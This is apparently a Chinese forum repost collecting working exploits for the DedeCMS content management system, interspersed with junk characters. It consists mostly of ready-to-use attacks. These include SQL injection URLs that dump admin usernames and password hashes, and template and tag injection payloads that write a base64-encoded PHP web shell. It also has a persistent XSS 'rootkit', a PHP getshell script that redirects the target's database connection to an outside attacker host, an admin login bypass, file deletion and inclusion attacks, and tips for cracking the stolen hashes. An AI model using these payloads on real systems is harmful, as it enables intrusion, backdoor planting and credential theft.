|
|
; B4 Y7 u7 e- {# ]Dedecms 5.6 rss注入漏洞
% s. G0 ]) \( V+ Phttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1 J8 j* x# l$ R4 F" j t
" w. g: m# [7 s* w5 [( Q- m0 V
3 A/ R9 {9 W; D) Y
( p3 J8 |8 d( [/ D' l& Q( K3 h& D! s) N- \. _
* X2 Z# ?- r# b
/ G$ k1 g' g9 @
( }0 {# M" z( X6 B8 s
! a1 Z& Y5 _' \ b- o+ O% R. BDedeCms v5.6 嵌入恶意代码执行漏洞
; A' L: g, m" `; I" ~. Y注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}* D1 a' s' f" s9 `: i( c
发表后查看或修改即可执行
* |5 V3 g$ {8 h7 ya{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}5 g; w. R: Z; Y, J B2 l
生成x.php 密码xiao,直接生成一句话。
" }" Q; E; Q+ d
! t! m$ A! _& Y% E0 r( R
[( b4 Y5 o) h
[8 \5 c( D& j: j- |
' ?! n2 D1 Z+ Z. Y' q' K4 J$ S( q$ @. R2 `
1 T# O! e/ x1 d! ]. U: ?, w
3 X2 j( c- z7 s( H$ h; c0 K, `; v) }
Dede 5.6 GBK SQL注入漏洞5 x1 x: _! V# ~; R( q
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
5 \1 V _$ r# k; J" M0 u `" |2 ~+ lhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe0 p, _. `# Q" {8 X' ^* X
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A79 h! ^( K% b4 M0 j# t
5 q' A% O( m1 |6 L0 W
5 v1 q7 e6 f$ G' V2 F
1 p) ^9 R) n& c
' u, u1 _' K( t* k; S5 q9 O7 \& B0 D1 _$ ?( z- \5 e3 A
) u- @/ D* w% u2 l
+ |8 u: a" U( t/ {9 U2 V. Q2 `3 q# V; p' A
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 _ N1 }7 S! f1 C$ R
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 7 J/ ^! ~0 x$ @0 O" ~2 o* v
. X3 E3 Z3 ~. L! ?9 F% r$ p4 p9 l
* B' f# ]# p0 L% T# x3 ^8 m5 C0 m6 \+ v, ?) c5 h
2 Z0 Q6 [3 R6 s0 i/ M3 x! E* j# ?8 x+ t7 m/ i) V
9 g9 a8 ?. w7 g* v' SDEDECMS 全版本 gotopage变量XSS漏洞
- S J. Y% O# J% y6 k& H1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
4 r" b ^- m7 _/ M' dhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="9 ~. }* E7 n! O- S2 j; ?% h
/ {' L* ` j3 o0 Q. C$ E$ m
( u6 }% Z' r5 X2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
% u5 w5 a7 Y9 I+ _: p0 Qhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
3 p4 o) ^4 I. U# ?1 g
! C5 I/ d/ T0 ~- X2 c0 E: J% P$ N( y' i, i
http://v57.demo.dedecms.com/dede/login.php Y" d" H; c" I# d* R9 V5 }- @1 c
{5 O+ c; B6 c, {+ d, t) a
! n, Q# }& Q0 J* y
color=Red]DeDeCMS(织梦)变量覆盖getshell
' }( {( G7 {$ Y# g, j#!usr/bin/php -w
1 Q* G8 t1 d7 {& ]4 n, e; h% r<?php
8 F) `: i- ]* X8 a, y9 herror_reporting(E_ERROR);
7 E+ w* P# j) pset_time_limit(0);4 r, w8 Y6 C0 ^3 U0 x
print_r('
" l% b6 e' ?) Q: ^ a, CDEDEcms Variable Coverage
! U% c( Y7 L7 z5 ^4 F/ d _7 [' SExploit Author: www.heixiaozi.comwww.webvul.com
, a: T4 w$ ?1 |( `3 C);
6 Z$ _; B8 R4 ]+ @; e" ]' mecho "\r\n";/ o6 Y# O6 z& i5 W+ W; q
if($argv[2]==null){3 m! l. F+ g3 r3 w0 N. s
print_r('* j! {$ B; U5 t6 \0 k6 p& J
+---------------------------------------------------------------------------+& Q9 Q/ z% g; e& P* z. l; |) X
Usage: php '.$argv[0].' url aid path
0 P. z. z, g6 ]aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
5 U# i6 F, w ^; W$ iExample:' M W9 e0 U P }' ?) A# i+ v7 _
php '.$argv[0].' www.site.com 1 old# T# |, T9 j8 X2 q: @
+---------------------------------------------------------------------------+
2 C* [! }! `0 M$ {0 c* q');- x' Y% n' d& t s7 v8 R; i
exit;
9 F$ H4 z2 \% I4 r# b+ [}# [' {. u" R6 p- u% n
$url=$argv[1];
8 t0 H& r& w- @( c% u$ m$aid=$argv[2];
; p: I( {2 g2 Q: X; D8 s8 y) O$path=$argv[3];
) }5 O! Z3 e, M# b$exp=Getshell($url,$aid,$path);# H( F4 U4 S; D G
if (strpos($exp,"OK")>12){* e& s% M, t) o- ]6 d& F
echo "9 a1 z) U- f% Z, q
Exploit Success \n";
: P+ n' R' }( ]7 N) {/ H: G/ Fif($aid==1)echo "
8 k, P7 K, S+ NShell:".$url."/$path/data/cache/fuck.php\n" ;! W5 T0 J% I4 ]5 b* @
' D" v- b, D3 m" [8 y
6 Z( E5 ~7 Y* v6 k+ Tif($aid==2)echo "
( o+ Y8 h' X. {Shell:".$url."/$path/fuck.php\n" ;
+ ~! N: R- r4 V9 |( r1 U% \! m& [: J7 T0 J& W
+ n& O d- k- F% |& Q; K6 P. [
if($aid==3)echo ". J+ F* j2 }3 u& X7 N2 ?! q$ n
Shell:".$url."/$path/plus/fuck.php\n";# K* u( X0 O: f: I) `
" m, g( N$ v m+ n! I F. E! X/ Z4 P* u
, W& w, r5 W( C3 X2 X2 x* U, ^}else{8 e/ Z9 N# n, z1 R! D; }+ H8 `
echo "4 x# ~" V8 N6 |) Y* g( O4 S
Exploit Failed \n";2 T- Y; M: T5 C- o
}
`0 @9 g* |9 B+ i Qfunction Getshell($url,$aid,$path){
5 M9 O( U5 e6 c. H0 m/ @$id=$aid;
7 _$ ?7 Y2 B& c3 U' C$host=$url;* Y2 I* r$ N7 @3 q8 T0 l4 y
$port="80";
. V; B8 ?6 {4 q7 W6 t$ W$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";- _/ ~ v6 L2 B& t7 _/ Z0 Y
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";' w. h* q) K0 c% h5 [
$data .= "Host: ".$host."\r\n";
! | ^9 P" W, U- i/ {7 g$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
9 g ~ l; b5 B$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
/ V" G' D, w2 r1 l: _- ?5 Y, c$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
. w4 D+ W# L& g2 D( Y//$data .= "Accept-Encoding: gzip,deflate\r\n";$ j# I% }; V0 A5 o
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";" @( _# `1 \# e* A' ^
$data .= "Connection: keep-alive\r\n";
2 m9 o9 p$ S6 [! Y4 D; l! r! C+ r$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
8 n6 a: k$ h8 j0 g$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
, G$ f, X" q* m c: y$data .= $content."\r\n";8 K1 S& c \# e9 z% e/ Z x
$ock=fsockopen($host,$port);! Y" Y: B" g6 X; \. Q* }0 a
if (!$ock) {' [. |1 `, X( v0 j# t/ D
echo "* {( T! N' l. ~3 t* X9 A
No response from ".$host."\n";9 e! ~, H+ T5 i" _
}
I- ~ G& |: y! Q) Afwrite($ock,$data);
. v: M- [' K. wwhile (!feof($ock)) {
. W& C& d% `& V2 v0 b2 H" m$exp=fgets($ock, 1024);
/ q2 {8 c- U9 C2 r& G& g& ]$ Nreturn $exp;' D4 f6 s+ D1 f) K; F, s5 r
}
9 n3 X. q* |5 Q! X1 H, ~6 @}# a! Q$ E- ]0 Q& S5 |+ t9 `
: e! Z `* v" U/ k$ l( P
3 J8 y/ y1 x+ m& u! F7 w% C
?>
% u# I+ u0 Q2 R6 z
( k* J0 T" j: ~ b! V
% b2 d$ o+ j2 J% U2 {0 g4 h& O/ R' i; l
$ n9 k: R4 j+ e2 v
- }5 B5 ~, V1 K5 J) G$ Z: T* [; u) u
- x4 @) m$ `$ C) s! {3 ~
7 s$ D" L" ?! f1 Q
% k7 b3 H* }: U% {* L6 n) L
5 l# b6 {) L+ m! g* k6 eDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)* |1 [0 A) A6 u: B& |8 l8 L
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root; j: G7 a t. J5 \& g( L3 e
' {2 Y2 |6 o; Z- T& c2 v6 V: B V3 D: H7 u1 o" r
把上面validate=dcug改为当前的验证码,即可直接进入网站后台6 c/ E, ~: j* ~' ?
7 a/ B9 m8 w4 e
# H7 q* p6 i q9 [1 R& ]0 `
此漏洞的前提是必须得到后台路径才能实现1 @$ e9 `! M$ X f; `
+ O/ }. X: J; Q3 n5 a4 {, g# n3 q4 u* V
- f1 w. u8 c( @' Q5 Y: @6 \) v, F; i8 S. w
0 s( @9 J( @1 h' Y6 x- K/ j
. J0 M3 r' x' R! n. i6 j7 J
; u( b/ v& P2 j* b* {* E9 F) g3 N
9 f* u9 m7 v$ {; e9 Y b% f# B" H' ]1 Z, d: u
o9 `% \% Y+ E" {1 } K% }, [$ q8 M( N- ~9 u0 b
Dedecms织梦 标签远程文件写入漏洞1 S) J/ {) X: d7 l' w1 J$ n: e6 u
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');- e8 _" Y* a; ^: P& ?! \: N' T
8 ~4 l" u& ^- V& V
- _8 p9 r b, g+ M6 h$ i9 ?
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 4 B Y. o0 j" N$ a# \
<form action="" method="post" name="QuickSearch" id="QuickSearch">
, Y8 |, H5 D+ ~* h4 U<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />5 Q6 p: U. X# @5 P, R
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />2 f7 o' e4 k4 A# |0 w( k9 t* I7 @+ R
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
6 ?4 Q8 h: x- t6 R<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
" ` n# q/ `* U! |<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />" W% _' {& ~0 e0 x: O
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />/ c% a1 c4 L& |9 p- p( g+ u1 F
<input type="text" value="true" name="nocache" style="width:400">
' B% H& f5 H5 ~5 n [/ \<input type="submit" value="提交" name="QuickSearchBtn"><br />' W& Y& z, `5 e' W( w( I1 ?
</form>
: q1 }9 q1 ]) i1 ~2 j7 Y<script>
2 @4 z; j" h& W" g7 h, `9 ]function addaction()
. S* h9 u/ M+ }% x7 K{" A8 k0 _( M2 A0 d5 D
document.QuickSearch.action=document.QuickSearch.doaction.value;# \5 |+ F7 V# m: a- A0 ?$ ?$ _
}
1 `; j* ]. k5 P% L: I% B</script>+ x5 I: J! l( | y
7 k/ b# X3 K a# p& v5 m' g! w5 S
/ ~$ ?( O( f F' r+ Z$ k2 ~
; a, f5 f, ]$ \% r8 Z7 U2 @7 _3 z, r) B6 A9 @- i7 Q: {
2 @' c$ K1 J# ^7 _
7 m- L2 M b2 E0 Z
; v+ Q& a! d" d3 l0 u+ ?1 A R/ T4 G) a8 `& D. q; U
9 t9 [2 Q) Q) d+ J1 [* A; SDedeCms v5.6 嵌入恶意代码执行漏洞* f6 W0 l: s) A4 m
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行: h; O8 D8 x/ n S: q* w6 w9 `
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}0 e7 X- v+ O- y% y) s* k9 `
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得( M; |) B8 U' Z* U2 j
Dedecms <= V5.6 Final模板执行漏洞
! x3 j$ T( O9 ~5 H) P# Z注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
D3 y& u( y6 N0 V9 ]5 x& q) muploads/userup/2/12OMX04-15A.jpg i ^1 e/ @* `, m& ?& q& @
* Q( O( m9 Q& d" @
* V& P5 ~9 C: L* [% @模板内容是(如果限制图片格式,加gif89a):
; i! t* o3 o0 f9 `- G& G{dede:name runphp='yes'}
& F* i6 z/ o' I$ N1 T5 Q$fp = @fopen("1.php", 'a');
0 [- \" }$ C P& X9 j' z6 S+ T, |@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
0 K9 @# Q! H- f5 K# _@fclose($fp);+ J9 h$ T6 {& _9 U
{/dede:name}
1 f( l& n' V2 _* b+ K2 修改刚刚发表的文章,查看源文件,构造一个表单:, U& x! ? [, m6 `1 T& ?( @# M
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">+ L0 Q$ z# D. W; s2 {" g9 Y7 F
<input type="hidden" name="dopost" value="save" />
* D2 G9 _8 H; ^% n<input type="hidden" name="aid" value="2" />
' k- g' g- `& |3 Z<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" /> R8 k6 P& S3 }6 E1 b8 M6 ]
<input type="hidden" name="channelid" value="1" />
! U- u0 c9 l( X8 Y<input type="hidden" name="oldlitpic" value="" />. W. }, I3 B1 d. G7 E
<input type="hidden" name="sortrank" value="1275972263" />7 _3 q- a* G" `2 F
% I1 g0 T0 g* M. v: n3 {7 x# L2 u
) o$ g) w7 e) w9 P, K
<div id="mainCp"> Y& `. e" B) V; k4 W7 M1 y D+ M% Y
<h3 class="meTitle"><strong>修改文章</strong></h3>
+ P* I X- k$ D+ b8 z) d8 B/ p" P
+ E! i- l4 b4 Y! y. K7 B( M* l9 e/ X5 l& V
<div class="postForm">+ F1 _/ ^! `5 e- h! H
<label>标题:</label>
7 R3 C8 y, i! `2 H( I7 \<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>9 A. u$ p5 u7 ~+ [
# x# J1 V/ g( l |' }. G5 U; C" B& c, n
<label>标签TAG:</label>
: h3 k) c: c3 g Z/ H+ v1 D<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
6 T% D, _& I1 T# ]# x7 j$ J; C" g8 c2 z, x& d3 L; z7 {
: N, Y/ [5 v; C: ?( D
<label>作者:</label>
/ F- x6 z: V$ m<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
. ~' x. v! H# V; r
! T W9 r4 M. ~1 Z: Q+ r% F) w8 n2 T; p! z1 i! K# D" P( [0 G. Z+ t
<label>隶属栏目:</label>4 ]* J% ]) v3 M# B, D
<select name='typeid' size='1'>1 U' y3 B1 ]% |) p9 d# ^
<option value='1' class='option3' selected=''>测试栏目</option>
' S/ e" J- I4 N3 @& ^/ E</select> <span style="color:#F00">*</span>(不能选择带颜色的分类); K# ^; o3 t" L8 y1 `: z! G
8 |, c% b5 B; f6 I; v9 c6 L
. E$ r: U" T5 i$ W* R$ U3 F<label>我的分类:</label>) z5 R; j( j1 R( D; G. z; V1 u- J
<select name='mtypesid' size='1'>+ g) P+ A# {0 C- U+ P0 {% j
<option value='0' selected>请选择分类...</option>
# @2 {) `: e- w( N<option value='1' class='option3' selected>hahahha</option>0 n! \+ X5 m! |: l
</select>: y4 L) Z" q4 F5 ]$ @- o: @9 v7 q6 g
1 X& I% g. N4 j9 [" W2 {6 \' h
' g+ z9 Q% ^8 [6 o6 B1 T% t. Z, i<label>信息摘要:</label>2 @8 J9 \ J- y1 `3 {$ d2 |% q- }+ T
<textarea name="description" id="description">1111111</textarea>
9 P g+ g( l* @# w2 i4 F- D(内容的简要说明)
+ e- u! o: }( t5 u E n) `! K/ G5 d" z2 m+ Y% O4 l
* j3 z: n; ]/ ]4 ~: @
<label>缩略图:</label>
. z- H6 J9 j+ E3 ]: |<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
5 c4 M* l5 i0 y% s7 A r& D3 B
4 g, C/ x# J: O1 b) |" F# w4 s
& i% c; P, T* ^: a7 K<input type='text' name='templet'" y+ {5 J' M- M
value="../ uploads/userup/2/12OMX04-15A.jpg">
' ]" \, |" [( c; [7 Z1 a<input type='text' name='dede_addonfields'$ i% U: I6 h8 v. T/ s+ S
value="templet,htmltext;">(这里构造)" D! }5 F$ S6 S& h: f
</div>
5 _! C( w3 `( P* d% B7 ?/ E6 |, S3 G- p& n6 u$ F: Q% C4 O% m
" W3 n: q! u- m$ I! B% f<!-- 表单操作区域 -->
& l$ w3 R( I# F, y+ Q* N- d<h3 class="meTitle">详细内容</h3>2 p" E' Z% X( n& @5 @% R
9 Y4 R" _5 ^* n1 |
! a3 B8 A) g4 `, Y% J, `2 q5 D<div class="contentShow postForm">0 n6 f/ p. i1 `& ?8 Q2 i
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
. U$ B! \; O' C/ s8 R" Z
9 H0 N) ]8 ~! u$ M# x8 j2 u: t$ }, b) ?* ]& i: Q
<label>验证码:</label>) S) m+ \3 H* F9 b0 v4 ]1 Z# ^ g
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
# q" b' t7 p$ P<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
) c( F! p l; @8 L$ D8 Q6 T% I" w- |3 ^, j0 _! s8 @5 U' N9 k
9 l5 m' ~' ]( d8 b, j$ O; a<button class="button2" type="submit">提交</button>0 a! `0 ^ D& t. }- d/ l
<button class="button2 ml10" type="reset">重置</button> ?/ ]6 m% ` B7 z% S
</div>
: ^3 @8 x- u z/ Q' F1 Y0 J
! o8 u5 C: l- E7 t: U. c
# F; D) s6 s$ I, K! n$ s ]4 _</div>9 M# A! F T4 s8 A& A' ^. ]% O. p
( y; p6 T4 e& {9 s
7 C/ g6 C& p# C6 \+ J</form>. C" P4 y. C9 J+ x. t4 \' C
# R" \- B% h! M9 K9 [" D _1 c
! K& I8 g$ S: e5 j7 \6 e提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:) v- `9 Y: E4 M8 w+ I& @' k
假设刚刚修改的文章的aid为2,则我们只需要访问:
3 v+ c, x5 X" `- ]' c! yhttp://127.0.0.1/dede/plus/view.php?aid=2) E! `! a X+ ^. C
即可以在plus目录下生成webshell:1.php5 S/ m! N `2 M& [0 ]7 k6 S7 D
9 X' p o" ?/ w7 u' e
6 f1 f" n; R1 F% N, o
5 i" d/ H4 J: F, i5 G) J o; {1 ?: F$ g
' v& w6 `; r! f) B, @4 F
/ J) H1 l2 Z+ T3 } G! k/ a
% q9 i, C9 M* v7 u- Y
* ~: H6 L9 {9 Q( t9 p
+ s5 _3 _1 n. M/ y" R" L; U# `+ P7 L2 l: u) L
& M9 j# \7 u8 z- i3 l% d+ L0 R9 u
# \4 ~: ^) t+ n; ^1 V% g
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
9 o- z0 F) T; f& i% {8 UGif89a{dede:field name='toby57' runphp='yes'}) n4 L+ u- a; V, [$ r" V, {8 K5 a
phpinfo();
* G+ ~+ E9 }( ^% E$ q{/dede:field}; Q* r2 v7 A. k9 N# ~- g' i
保存为1.gif3 S3 _' {2 {. q6 r& U) x& ?; \6 g; Q
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> , F/ t6 c) r3 S c+ ^/ S2 n4 [
<input type="hidden" name="aid" value="7" /> 4 H G+ G+ W) O0 G1 a1 w7 j
<input type="hidden" name="mediatype" value="1" /> ! P: D F! M8 c5 |- x% q/ y# C
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> % o* P" w. P& G9 U$ c! B. s5 z
<input type="hidden" name="dopost" value="save" />
4 }0 S- V) z( T) h5 o9 R' O7 R<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> " U5 M8 \' P( z+ K
<input name="addonfile" type="file" id="addonfile"/> * Y$ N; Q7 d3 G9 ?* \8 \1 a( \$ N6 T
<button class="button2" type="submit" >更改</button> & f6 i. Z8 J9 d/ V5 M/ G, z0 I
</form> # C! g) G T! P1 S9 ]! J
/ L) z/ ~! C, H. s! [7 ^- m* O4 C4 n1 M$ d) R
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif9 x3 F- P4 q% f! x( W( ]
发表文章,然后构造修改表单如下:" h4 ^9 j0 x# Z7 ?, ?
5 ` \1 N! ?. F2 U; V. P9 G' Z3 b+ I8 W m, B$ ~+ E
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
% L2 V$ O$ w5 i0 Y6 @1 P<input type="hidden" name="dopost" value="save" /> 4 ^1 u" u g# z( n) s
<input type="hidden" name="aid" value="2" />
# K$ H% [/ T/ x1 F<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
$ j3 H) K) f* {) m/ |3 {8 l<input type="hidden" name="channelid" value="1" /> , n" D. `2 N0 ~6 }8 }* c8 L; ~
<input type="hidden" name="oldlitpic" value="" />
4 w+ w1 U3 }& {2 [5 k. l<input type="hidden" name="sortrank" value="1282049150" />
/ n4 G4 q2 z5 \+ D/ ~' \<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
. V" _, }5 ^1 x+ d( \: r( s7 M3 S Z<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
- o9 v6 [1 v, }' b<select name='typeid' size='1'>
' X) h8 h' X4 C( Q<option value='1' class='option3' selected=''>Test</option> ( P' y2 e: t8 P2 l
<select name='mtypesid' size='1'>
! D) U3 D( @* j<option value='0' selected>请选择分类...</option> / b* V {2 }8 B* b" K
<option value='1' class='option3' selected>aa</option></select> 3 L' x. k) O: s) z1 R. f
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> - t. z* w( q- a: X" t0 u
<input type='hidden' name='dede_addonfields' value="templet"> 0 n: h2 J" p" X, |' Y; {
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 6 C5 ~6 G1 Q* [ d/ g
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
& \; N% U. a* m: B2 t, f% F" k2 g<button class="button2" type="submit">提交</button> , x7 w% O' z% y( ?
</form>, J, [- F5 Z z0 o
4 K, B. M' _2 l* w+ v8 z# B
" ^9 a$ p* h1 m6 J6 _ z
& _1 W. [5 N! p1 \2 J H& Y% v- [% u5 c' h& ~9 P' m: p
3 @5 s6 T* K# g9 L3 P
6 B. ~) R5 W2 |) {+ k+ `+ I/ M) v! ?6 _, V
4 q! i$ F( K) \
( d8 E5 ?7 x0 {3 A! o8 d( v
% _+ M3 {0 C2 Q% I/ V j" V9 z1 i' C
/ U6 n2 y# H9 k1 k9 J织梦(Dedecms)V5.6 远程文件删除漏洞
* u" z$ C# s) \1 s: l; C" Nhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif! s1 P5 D1 x. T! b2 M$ s
" Y6 z, W# q6 }
0 t7 s4 u) n/ d; c1 F* W( k2 \
/ h9 D) `9 x2 M; t- T1 v% l, X+ H! N& Q Q* V4 @5 [5 z3 K
. Y9 A. ^# h4 C R+ P2 V
( W8 w: A2 | i" j
/ l: |8 d8 v' v6 H# X0 N' ~- R: p7 Q# Y* o1 x' q
. C' ~8 ^+ A" _2 [3 T* M* o
; C+ A- p7 m' l; `* ^织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
& N1 X% k9 ^9 Fhttp://www.test.com/plus/carbuya ... urn&code=../../
& S$ R$ t, n W$ P
6 k+ Z& t) x. r
) R9 j8 f y; U* F( x/ j: x5 }; {* G9 z) E6 L9 U" Z
, @' M& K, G% n" s" X) X& f; Y1 y4 q% n" \
1 W. [7 i! L; M" D- r- y. z
' S* U: W" {* M; s" N- N1 t" A+ s0 p7 \
& _( H4 z3 @" M. T/ h
, R1 v& B9 h) n( N8 n0 TDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
$ {5 `6 ]$ e& Z* Z: T; q$ Rplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
0 \# v) [3 w) D7 G8 [: T) Z密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5/ e/ P5 A" i# a1 B
B! J$ N9 T( U8 Z6 R; I2 q# l' K$ j: s
5 T6 W4 m* O4 [
9 [2 }: k& | S W5 t. N+ E& x% ]* `6 l
+ c% h6 _" U3 g5 ]3 N% q* S+ \8 Q
4 n3 A- ?* V" V" e1 \
5 e) E0 ^6 f, ?- e
* N( {$ l! V- T3 C" f, b: g& ]5 _! [; X' t! g/ A( o
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
0 x$ P9 \" E6 X$ x+ _! ?/ u. {5 thttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
' S" ^+ H- A) G
! B M( \8 @- L3 i' w# o6 F, f6 M) H" ^2 _4 G; {" y% T6 h- y7 C L! N
. N8 G% A3 n# o; b! H. v. r
' B, D9 U( d1 E5 G0 `
+ Y" Q4 ~# f( d5 ~
/ c1 U4 K q: r6 p
% h2 [& M8 h/ t+ A* a" n
, s* [# O" J* p4 P
2 ?7 }* D/ W5 ^6 ~! F X9 N
